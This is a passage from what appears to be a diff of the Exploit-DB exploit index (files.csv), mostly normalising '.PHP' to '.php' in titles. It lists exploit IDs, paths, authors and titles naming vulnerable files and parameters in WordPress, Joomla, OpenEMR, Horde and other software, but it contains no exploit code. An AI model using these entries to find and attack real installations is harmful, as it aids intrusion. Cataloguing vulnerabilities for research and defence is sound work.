index.php Local File Include Vulnerability",2007-02-26,"D. Matscheko",php,webapps,0 +29682,platforms/php/webapps/29682.txt,"WordPress 2.1.1 - Post.php Cross-Site Scripting Vulnerability",2007-02-26,Samenspender,php,webapps,0 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service Vulnerability",2007-02-27,"Steve Grubb",linux,dos,0 29684,platforms/php/webapps/29684.txt,"WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps,0 29685,platforms/windows/remote/29685.txt,"Nullsoft Shoutcast 1.9.7 Logfile HTML Injection Vulnerability",2007-02-27,SaMuschie,windows,remote,0 @@ -26596,12 +26597,12 @@ id,file,description,date,author,platform,type,port 29553,platforms/osx/dos/29553.txt,"Apple Mac OS X 10.4.x Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 29554,platforms/osx/dos/29554.txt,"Apple Mac OS X 10.4.x iPhoto photo:// URL Handling Format String",2007-01-30,LMH,osx,dos,0 29555,platforms/osx/dos/29555.txt,"Apple Mac OS X 10.4.x Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 -29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 Import_XML.PHP Remote File Include Vulnerability",2007-01-31,trzindan,php,webapps,0 -29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 Login_Frame.PHP Cross-Site Scripting Vulnerability",2007-01-31,"Michael Melewski",php,webapps,0 +29556,platforms/php/webapps/29556.txt,"OpenEMR 2.8.2 Import_XML.php Remote File Include Vulnerability",2007-01-31,trzindan,php,webapps,0 +29557,platforms/php/webapps/29557.txt,"OpenEMR 2.8.2 Login_Frame.php Cross-Site Scripting Vulnerability",2007-01-31,"Michael Melewski",php,webapps,0 29558,platforms/windows/dos/29558.c,"Comodo Firewall 2.3.6 CMDMon.SYS Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos,0 29559,platforms/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",php,webapps,0 -29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 Lang.PHP Remote File Include Vulnerability",2007-02-02,"Hasadya Raed",php,webapps,0 -29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 Index.PHP Cross-Site Scripting Vulnerability",2007-02-02,Doz,php,webapps,0 +29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 Lang.php Remote File Include Vulnerability",2007-02-02,"Hasadya Raed",php,webapps,0 +29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 Index.php Cross-Site Scripting Vulnerability",2007-02-02,Doz,php,webapps,0 29562,platforms/php/webapps/29562.txt,"PortailPHP 2 mod_news/index.php chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 29563,platforms/php/webapps/29563.txt,"PortailPHP 2 mod_news/goodies.php chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 29564,platforms/php/webapps/29564.txt,"PortailPHP 2 mod_news/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 @@ -26609,7 +26610,7 @@ id,file,description,date,author,platform,type,port 29566,platforms/php/webapps/29566.txt,"PortailPHP 2 mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting Vulnerability",2007-02-05,digi7al64,cfm,webapps,0 29568,platforms/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Remote And Local File Include Vulnerabilities",2007-02-05,anonymous,php,webapps,0 -29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine Affichearticles.PHP3 - Remote File Include Vulnerability",2007-02-06,Blaster,php,webapps,0 +29569,platforms/php/webapps/29569.txt,"MySQLNewsEngine Affichearticles.php3 - Remote File Include Vulnerability",2007-02-06,Blaster,php,webapps,0 29570,platforms/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Change Admin Password CSRF Vulnerability",2013-11-13,"Hubert Gradek",hardware,webapps,0 29571,platforms/php/webapps/29571.txt,"SYSCP 1.2.15 System Control Panel CronJob Arbitrary Code Execution Vulnerability",2007-02-07,"Daniel Schulte",php,webapps,0 29572,platforms/php/webapps/29572.txt,"CPanel <= 11 PassWDMySQL Cross-Site Scripting Vulnerability",2007-02-08,s3rv3r_hack3r,php,webapps,0 @@ -26638,19 +26639,19 @@ id,file,description,date,author,platform,type,port 29595,platforms/linux/remote/29595.txt,"PHP RRD Browser 0.2 P Parameter Directory Traversal Vulnerability",2007-02-12,"Sebastian Wolfgarten",linux,remote,0 29596,platforms/asp/webapps/29596.txt,"EWay 4 Default.APSX Cross-Site Scripting Vulnerability",2007-02-12,"BLacK ZeRo",asp,webapps,0 29597,platforms/asp/webapps/29597.txt,"Community Server SearchResults.ASPX Cross-Site Scripting Vulnerability",2007-02-12,BL4CK,asp,webapps,0 -29598,platforms/php/webapps/29598.txt,"WordPress 1.x/2.0.x - Templates.PHP Cross-Site Scripting Vulnerability",2007-02-12,PsychoGun,php,webapps,0 -29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 Error.PHP Cross-Site Scripting Vulnerability",2007-02-13,Spiked,php,webapps,0 +29598,platforms/php/webapps/29598.txt,"WordPress 1.x/2.0.x - Templates.php Cross-Site Scripting Vulnerability",2007-02-12,PsychoGun,php,webapps,0 +29599,platforms/php/webapps/29599.txt,"TaskFreak! 0.5.5 Error.php Cross-Site Scripting Vulnerability",2007-02-13,Spiked,php,webapps,0 29600,platforms/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site listmain.asp cat Parameter XSS",2007-02-13,ShaFuck31,asp,webapps,0 29601,platforms/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site listmain.asp cat Parameter SQL Injection",2007-02-13,ShaFuck31,asp,webapps,0 29602,platforms/php/webapps/29602.txt,"WebTester 5.0.20060927 directions.php typeID Parameter SQL Injection",2007-02-14,"Moran Zavdi",php,webapps,0 29603,platforms/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash Vulnerability",2007-02-15,"Matousec Transparent security",windows,local,0 -29604,platforms/php/webapps/29604.txt,"ibProArcade 2.5.9+ Arcade.PHP SQL Injection Vulnerability",2007-02-15,sp00k,php,webapps,0 -29605,platforms/php/webapps/29605.txt,"Deskpro 1.1 Faq.PHP Cross-Site Scripting Vulnerability",2007-02-15,"BLacK ZeRo",php,webapps,0 -29606,platforms/php/webapps/29606.txt,"Calendar Express Search.PHP Cross-Site Scripting Vulnerability",2007-02-15,BL4CK,php,webapps,0 -29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 unistall.php Authentication Bypass",2007-02-26,R00t[ATI],php,webapps,0 +29604,platforms/php/webapps/29604.txt,"ibProArcade 2.5.9+ Arcade.php SQL Injection Vulnerability",2007-02-15,sp00k,php,webapps,0 +29605,platforms/php/webapps/29605.txt,"Deskpro 1.1 Faq.php Cross-Site Scripting Vulnerability",2007-02-15,"BLacK ZeRo",php,webapps,0 +29606,platforms/php/webapps/29606.txt,"Calendar Express Search.php Cross-Site Scripting Vulnerability",2007-02-15,BL4CK,php,webapps,0 +29676,platforms/php/webapps/29676.txt,"Audins Audiens 3.3 unistall.php Authentication Bypass",2007-02-26,r00t,php,webapps,0 29607,platforms/windows/dos/29607.html,"EasyMail Objects 6.x Connect Method Remote Stack Buffer Overflow Vulnerability",2007-02-02,"Paul Craig",windows,dos,0 29608,platforms/php/webapps/29608.txt,"CedStat 1.31 index.php hier Parameter XSS",2007-02-16,sn0oPy,php,webapps,0 -29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 Include.PHP Remote File Include Vulnerability",2007-02-16,KaRTaL,php,webapps,0 +29609,platforms/php/webapps/29609.txt,"Meganoide's News 1.1.1 Include.php Remote File Include Vulnerability",2007-02-16,KaRTaL,php,webapps,0 29610,platforms/php/webapps/29610.txt,"Ezboo Webstats 3.03 Administrative Authentication Bypass Vulnerability",2007-02-16,sn0oPy,php,webapps,0 29611,platforms/asp/webapps/29611.txt,"Turuncu Portal 1.0 H_Goster.ASP SQL Injection Vulnerability",2007-02-16,chernobiLe,asp,webapps,0 29612,platforms/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability",2013-11-15,"Yakir Wizman",hardware,webapps,0 @@ -26662,10 +26663,10 @@ id,file,description,date,author,platform,type,port 29618,platforms/windows/dos/29618.c,"News File Grabber 4.1.0.1 Subject Line Stack Buffer Overflow Vulnerability (2)",2007-02-19,Marsu,windows,dos,0 29619,platforms/windows/remote/29619.html,"Microsoft Internet Explorer 6.0 - Local File Access Weakness",2007-02-20,"Rajesh Sethumadhavan",windows,remote,0 29620,platforms/osx/dos/29620.txt,"Apple Mac OS X 10.4.8 - ImageIO GIF Image Integer Overflow Vulnerability",2007-02-20,"Tom Ferris",osx,dos,0 -29621,platforms/php/webapps/29621.txt,"AbleDesign MyCalendar 2.20.3 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-02-20,sn0oPy,php,webapps,0 +29621,platforms/php/webapps/29621.txt,"AbleDesign MyCalendar 2.20.3 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-02-20,sn0oPy,php,webapps,0 29622,platforms/asp/webapps/29622.txt,"Design4Online Userpages2 Page.ASP SQL Injection Vulnerability",2007-02-20,xoron,asp,webapps,0 29623,platforms/cgi/webapps/29623.txt,"Google Desktop Cross-Site Scripting Weakness",2007-02-21,"Yair Amit",cgi,webapps,0 -29624,platforms/php/webapps/29624.txt,"CedStat 1.31 Index.PHP Cross-Site Scripting Vulnerability",2007-02-21,sn0oPy,php,webapps,0 +29624,platforms/php/webapps/29624.txt,"CedStat 1.31 Index.php Cross-Site Scripting Vulnerability",2007-02-21,sn0oPy,php,webapps,0 29625,platforms/php/webapps/29625.txt,"phpTrafficA 1.4.1 plotStat.php file Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 29626,platforms/php/webapps/29626.txt,"phpTrafficA 1.4.1 banref.php lang Parameter Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps,0 29627,platforms/php/webapps/29627.php,"Magic News Plus 1.0.2 preview.php php_script_path Parameter Remote File Inclusion",2007-02-21,"HACKERS PAL",php,webapps,0 @@ -26676,17 +26677,17 @@ id,file,description,date,author,platform,type,port 29632,platforms/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 admin/index.php Multiple Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29633,platforms/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent / Stored XSS",2013-11-16,"Ali Raza",ios,webapps,0 29634,platforms/php/webapps/29634.txt,"Plantilla list_main_pages.php nfolder Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 -29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 Edit.PHP Directory Traversal Vulnerability",2007-02-22,"laurent gaffie",php,webapps,0 +29635,platforms/php/webapps/29635.txt,"Pheap 1.x/2.0 Edit.php Directory Traversal Vulnerability",2007-02-22,"laurent gaffie",php,webapps,0 29636,platforms/php/webapps/29636.txt,"LoveCMS 1.4 install/index.php step Parameter Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps,0 29637,platforms/php/webapps/29637.txt,"LoveCMS 1.4 install/index.php step Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29638,platforms/php/webapps/29638.txt,"LoveCMS 1.4 index.php load Parameter Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps,0 29639,platforms/php/webapps/29639.txt,"LoveCMS 1.4 index.php id Parameter XSS",2007-02-22,"laurent gaffie",php,webapps,0 -29640,platforms/php/webapps/29640.txt,"Shop Kit Plus StyleCSS.PHP Local File Include Vulnerability",2007-02-23,"laurent gaffie",php,webapps,0 -29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 Index.PHP Local File Include Vulnerability",2007-02-23,"laurent gaffie",php,webapps,0 +29640,platforms/php/webapps/29640.txt,"Shop Kit Plus StyleCSS.php Local File Include Vulnerability",2007-02-23,"laurent gaffie",php,webapps,0 +29641,platforms/php/webapps/29641.txt,"XT:Commerce 3.04 Index.php Local File Include Vulnerability",2007-02-23,"laurent gaffie",php,webapps,0 29642,platforms/php/webapps/29642.txt,"Simple one-file gallery gallery.php f Parameter Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps,0 29643,platforms/php/webapps/29643.txt,"Simple one-file gallery gallery.php f Parameter XSS",2007-02-23,"laurent gaffie",php,webapps,0 -29644,platforms/php/webapps/29644.txt,"Pickle 0.3 Download.PHP Local File Include Vulnerability",2007-02-24,"laurent gaffie",php,webapps,0 -29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 ShowCode.PHP Local File Include Vulnerability",2007-02-24,"Simon Bonnard",php,webapps,0 +29644,platforms/php/webapps/29644.txt,"Pickle 0.3 Download.php Local File Include Vulnerability",2007-02-24,"laurent gaffie",php,webapps,0 +29645,platforms/php/webapps/29645.txt,"Active Calendar 1.2 ShowCode.php Local File Include Vulnerability",2007-02-24,"Simon Bonnard",php,webapps,0 29646,platforms/php/webapps/29646.txt,"Active Calendar 1.2 data/flatevents.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 29647,platforms/php/webapps/29647.txt,"Active Calendar 1.2 data/js.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 29648,platforms/php/webapps/29648.txt,"Active Calendar 1.2 data/m_2.php css Parameter XSS",2007-02-24,"Simon Bonnard",php,webapps,0 @@ -26698,12 +26699,12 @@ id,file,description,date,author,platform,type,port 29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - (.reg) Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0 29790,platforms/php/webapps/29790.JPG,"ImpressPages CMS 3.8 - Stored XSS Vulnerability",2013-11-23,sajith,php,webapps,0 29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - Crash PoC (.wav)",2013-11-23,"Akin Tosunlar",windows,dos,0 -29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 Index.PHP Cross-Site Scripting Vulnerability",2007-02-24,"Simon Bonnard",php,webapps,0 +29658,platforms/php/webapps/29658.txt,"PhotoStand 1.2 Index.php Cross-Site Scripting Vulnerability",2007-02-24,"Simon Bonnard",php,webapps,0 29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability",2007-02-25,sehato,windows,dos,0 29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service (DoS) Vulnerability",2007-02-25,sehato,windows,dos,0 29661,platforms/php/webapps/29661.txt,"Docebo CMS 3.0.x index.php searchkey Parameter XSS",2007-02-24,ROOT[ATI],php,webapps,0 29662,platforms/php/webapps/29662.txt,"Docebo CMS 3.0.x modules/htmlframechat/index.php Multiple Parameter XSS",2007-02-24,ROOT[ATI],php,webapps,0 -29663,platforms/php/webapps/29663.txt,"SolarPay Index.PHP Local File Include Vulnerability",2007-02-26,"Hasadya Raed",php,webapps,0 +29663,platforms/php/webapps/29663.txt,"SolarPay Index.php Local File Include Vulnerability",2007-02-26,"Hasadya Raed",php,webapps,0 29664,platforms/windows/dos/29664.txt,"Microsoft Office Publisher 2007 - Remote Denial of Service (DoS) Vulnerability",2007-02-26,"Tom Ferris",windows,dos,0 29665,platforms/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Include Vulnerability",2007-02-26,"Simon Bonnard",php,webapps,0 29666,platforms/hardware/remote/29666.rb,"Supermicro Onboard IPMI close_window.cgi Buffer Overflow",2013-11-18,metasploit,hardware,remote,80 @@ -26715,11 +26716,11 @@ id,file,description,date,author,platform,type,port 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 URL Protocol Format String Vulnerability",2007-06-12,"Nir Rachmel",multiple,dos,0 30188,platforms/windows/dos/30188.txt,"Apple Safari Feed URI Denial of Service Vulnerability",2007-05-13,"Moshe Ben-Abu",windows,dos,0 30189,platforms/jsp/webapps/30189.txt,"Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross-Site Scripting Vulnerability",2007-06-14,anonymous,jsp,webapps,0 -30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 Mod_Lettermansubscribe.PHP Cross-Site Scripting Vulnerability",2007-06-14,"Edi Strosar",php,webapps,0 +30190,platforms/php/webapps/30190.txt,"Joomla! Letterman Subscriber Module 1.2.4 Mod_Lettermansubscribe.php Cross-Site Scripting Vulnerability",2007-06-14,"Edi Strosar",php,webapps,0 30191,platforms/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross-Site Scripting Vulnerability",2007-06-14,"Rajat Swarup",jsp,webapps,0 30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0 29672,platforms/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",php,webapps,80 -29673,platforms/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0 and 2.608.GV00.0 - Authentication Bypass",2013-11-18,"Jake Reynolds",hardware,webapps,37777 +29673,platforms/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass",2013-11-18,"Jake Reynolds",hardware,webapps,37777 29674,platforms/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload Vulnerability",2013-11-18,Security-Assessment.com,jsp,webapps,0 29675,platforms/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload Vulnerability",2013-11-18,Security-Assessment.com,asp,webapps,0 29789,platforms/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,php,webapps,0 @@ -26729,7 +26730,7 @@ id,file,description,date,author,platform,type,port 29691,platforms/linux/remote/29691.py,"Gnome Evolution 2.x GnuPG Arbitrary Content Injection Vulnerability",2007-03-05,"Gerardo Richarte",linux,remote,0 29692,platforms/php/dos/29692.txt,"PHP 3/4/5 ZendEngine Variable Destruction Remote Denial of Service Vulnerability",2007-03-01,"Stefan Esser",php,dos,0 29693,platforms/php/dos/29693.txt,"PHP 4/5 Executor Deep Recursion Remote Denial of Service Vulnerability",2007-03-01,"Maksymilian Arciemowicz",php,dos,0 -29694,platforms/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 Index.PHP SQL Injection Vulnerability",2007-03-01,Samenspender,php,webapps,0 +29694,platforms/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 Index.php SQL Injection Vulnerability",2007-03-01,Samenspender,php,webapps,0 29695,platforms/windows/local/29695.txt,"Comodo Firewall Pro 2.4.x - Local Protection Mechanism Bypass Vulnerability",2007-03-01,"Matousec Transparent security",windows,local,0 29696,platforms/php/webapps/29696.txt,"aWebNews 1.1 listing.php path_to_news Parameter Remote File Inclusion",2007-03-01,mostafa_ragab,php,webapps,0 29697,platforms/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog news.php Multiple Parameter XSS",2007-03-01,the_Edit0r,php,webapps,0 @@ -26757,7 +26758,7 @@ id,file,description,date,author,platform,type,port 29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - (.m3u) SEH Buffer Overflow (Unicode)",2013-11-24,"Mike Czumak",windows,local,0 29720,platforms/linux/dos/29720.txt,"Mozilla Firefox 2.0.0.2 Document.Cookie Path Argument Denial of Service Vulnerability",2007-03-08,"Nicolas DEROUET",linux,dos,0 29721,platforms/windows/dos/29721.pl,"Fish Multiple Remote Buffer Overflow Vulnerabilities",2007-03-08,"ilja van sprundel",windows,dos,0 -29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 CreateURL.PHP Remote File Include Vulnerability",2007-03-09,"Hasadya Raed",php,webapps,0 +29722,platforms/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 CreateURL.php Remote File Include Vulnerability",2007-03-09,"Hasadya Raed",php,webapps,0 29723,platforms/linux/dos/29723.txt,"Mozilla Firefox 2.0.0.2 - Unspecified GIF Handling Denial of Service Vulnerability",2007-03-09,Samuel,linux,dos,0 29724,platforms/linux/dos/29724.txt,"MySQL 5.0.x Single Row SubSelect Remote Denial of Service Vulnerability",2007-03-09,S.Streichsbier,linux,dos,0 29725,platforms/openbsd/remote/29725.py,"OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow Vulnerability",2007-03-09,"Alfredo Ortega",openbsd,remote,0 @@ -26771,22 +26772,22 @@ id,file,description,date,author,platform,type,port 29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80 29734,platforms/linux/remote/29734.txt,"PineApp MailSecure - Remote Command Execution",2013-11-20,"Ruben Garrote García",linux,remote,7443 29735,platforms/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow Vulnerability",2007-03-12,LSO,hardware,remote,0 -29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 ADODB-Connection.Inc.PHP Remote File Include Vulnerability",2007-03-12,"RaeD Hasadya",php,webapps,0 -29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 Check_Vote.PHP Local File Include Vulnerability",2007-03-13,"BorN To K!LL",php,webapps,0 +29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 ADODB-Connection.Inc.php Remote File Include Vulnerability",2007-03-12,"RaeD Hasadya",php,webapps,0 +29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 Check_Vote.php Local File Include Vulnerability",2007-03-13,"BorN To K!LL",php,webapps,0 29738,platforms/windows/dos/29738.txt,"Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability",2007-03-13,"Michal Majchrowicz",windows,dos,0 29739,platforms/linux/remote/29739.txt,"Apache HTTP Server Tomcat 5.x/6.0.x - Directory Traversal Vulnerability",2007-03-14,"D. Matscheko",linux,remote,0 29740,platforms/windows/dos/29740.txt,"MiniGZip Controls File_Compress Buffer Overflow Vulnerability",2007-03-14,starcadi,windows,dos,0 29741,platforms/windows/remote/29741.txt,"Microsoft Internet Explorer 7.0 NavCancel.HTM Cross-Site Scripting Vulnerability",2007-03-14,"Aviv Raff",windows,remote,0 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail <= 4.0.4 Client Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 29743,platforms/windows/dos/29743.txt,"Symantec SYMTDI.SYS Device Driver - Local Denial of Service (DoS) Vulnerability",2007-03-15,"David Matousek",windows,dos,0 -29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 Index.PHP Remote File Include Vulnerability",2007-03-15,"Abdus Samad",php,webapps,0 -29745,platforms/php/webapps/29745.txt,"Horde Framework <= 3.1.3 Login.PHP Cross-Site Scripting Vulnerability",2007-03-15,"Moritz Naumann",php,webapps,0 +29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 Index.php Remote File Include Vulnerability",2007-03-15,"Abdus Samad",php,webapps,0 +29745,platforms/php/webapps/29745.txt,"Horde Framework <= 3.1.3 Login.php Cross-Site Scripting Vulnerability",2007-03-15,"Moritz Naumann",php,webapps,0 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x Cleanup Cron Script Arbitrary File Deletion Vulnerability",2007-03-15,anonymous,linux,local,0 29747,platforms/php/webapps/29747.txt,"DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability",2007-03-16,Mandr4ke,php,webapps,0 -29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 Enkrypt.PHP Directory Traversal Vulnerability",2007-03-16,"BorN To K!LL",php,webapps,0 +29748,platforms/php/webapps/29748.txt,"Holtstraeter Rot 13 Enkrypt.php Directory Traversal Vulnerability",2007-03-16,"BorN To K!LL",php,webapps,0 29749,platforms/multiple/remote/29749.txt,"Oracle Portal 10g P_OldURL Parameter Cross-Site Scripting Vulnerability",2007-03-16,d3nx,multiple,remote,0 29750,platforms/php/webapps/29750.php,"PHPStats 0.1.9 - Multiple SQL Injection Vulnerabilities",2007-03-16,rgod,php,webapps,0 -29751,platforms/php/webapps/29751.php,"PHPStats 0.1.9 PHP-Stats-Options.PHP Remote Code Execution Vulnerability",2007-03-17,rgod,php,webapps,0 +29751,platforms/php/webapps/29751.php,"PHPStats 0.1.9 PHP-Stats-Options.php Remote Code Execution Vulnerability",2007-03-17,rgod,php,webapps,0 29752,platforms/php/remote/29752.php,"PHP <= 5.1.6 Mb_Parse_Str Function Register_Globals Activation Weakness",2007-03-19,"Stefan Esser",php,remote,0 29753,platforms/linux/remote/29753.c,"File(1) <= 4.13 Command File_PrintF Integer Underflow Vulnerability",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote,0 29754,platforms/php/webapps/29754.html,"WordPress 2.x - PHP_Self Cross-Site Scripting Vulnerability",2007-03-19,"Alexander Concha",php,webapps,0 @@ -26802,7 +26803,7 @@ id,file,description,date,author,platform,type,port 29764,platforms/php/webapps/29764.txt,"W-Agora 4.2.1 profile.php showuser Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0 29765,platforms/php/webapps/29765.txt,"W-Agora 4.2.1 - search.php search_user Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0 29766,platforms/php/webapps/29766.txt,"W-Agora 4.2.1 change_password.php userid Parameter XSS",2007-03-20,"laurent gaffie",php,webapps,0 -29767,platforms/hardware/dos/29767.txt,"Zyxel Router 3.40 Zynos SMB Data Handling Denial of Service Vulnerability",2007-03-20,"Joxean Koret",hardware,dos,0 +29767,platforms/hardware/dos/29767.txt,"ZyXEL Router 3.40 Zynos SMB Data Handling Denial of Service Vulnerability",2007-03-20,"Joxean Koret",hardware,dos,0 29768,platforms/linux/remote/29768.txt,"Mozilla FireFox 1.5.x/2.0 - FTP PASV Port-Scanning Vulnerability",2007-03-21,mark,linux,remote,0 29769,platforms/linux/remote/29769.txt,"Opera 9.x - FTP PASV Port-Scanning Vulnerability",2007-03-21,mark,linux,remote,0 29770,platforms/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning Vulnerability",2007-03-21,mark,linux,remote,0 @@ -26811,11 +26812,11 @@ id,file,description,date,author,platform,type,port 29773,platforms/php/webapps/29773.txt,"Free File Hosting System 1.1 login.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29774,platforms/php/webapps/29774.txt,"Free File Hosting System 1.1 register.php AD_BODY_TEMP Parameter Remote File Inclusion",2007-03-24,IbnuSina,php,webapps,0 29775,platforms/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Include Vulnerabilities",2007-03-26,Crackers_Child,php,webapps,0 -29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 Index.PHP Cross-Site Scripting Vulnerability",2007-03-26,Crackers_Child,php,webapps,0 +29776,platforms/php/webapps/29776.txt,"CcCounter 2.0 Index.php Cross-Site Scripting Vulnerability",2007-03-26,Crackers_Child,php,webapps,0 29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - (.m3u) SEH Buffer Overflow (Unicode)",2013-11-22,"Mike Czumak",windows,local,0 29780,platforms/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting Vulnerability",2007-03-26,The[Boss],php,webapps,0 29781,platforms/linux/dos/29781.c,"Linux Kernel 2.6.x - IPv6_SockGlue.c NULL Pointer Dereference DoS Vulnerability",2007-03-26,"Joey Mengele",linux,dos,0 -29782,platforms/php/webapps/29782.txt,"Satel Lite Satellite.PHP Local File Include Vulnerability",2007-11-26,rUnViRuS,php,webapps,0 +29782,platforms/php/webapps/29782.txt,"Satel Lite Satellite.php Local File Include Vulnerability",2007-11-26,rUnViRuS,php,webapps,0 29783,platforms/php/webapps/29783.txt,"Fizzle 0.5 RSS Feed HTML Injection Vulnerability",2007-03-26,"CrYpTiC MauleR",php,webapps,0 29784,platforms/php/remote/29784.php,"PHP <= 5.2.1 Folded Mail Headers Email Header Injection Vulnerability",2007-11-26,"Stefan Esser",php,remote,0 29785,platforms/php/remote/29785.txt,"aBitWhizzy whizzypic.php d Variable Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote,0 @@ -26827,9 +26828,9 @@ id,file,description,date,author,platform,type,port 30157,platforms/php/webapps/30157.txt,"Joomla JD-Wiki 1.0.2 dwpage.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30158,platforms/php/webapps/30158.txt,"Joomla JD-Wiki 1.0.2 wantedpages.php mosConfig_absolute_path Parameter Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps,0 30107,platforms/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps,0 -30109,platforms/php/webapps/30109.txt,"Particle Gallery 1.0 - Search.PHP Cross-Site Scripting Vulnerability",2007-05-30,Serapis.net,php,webapps,0 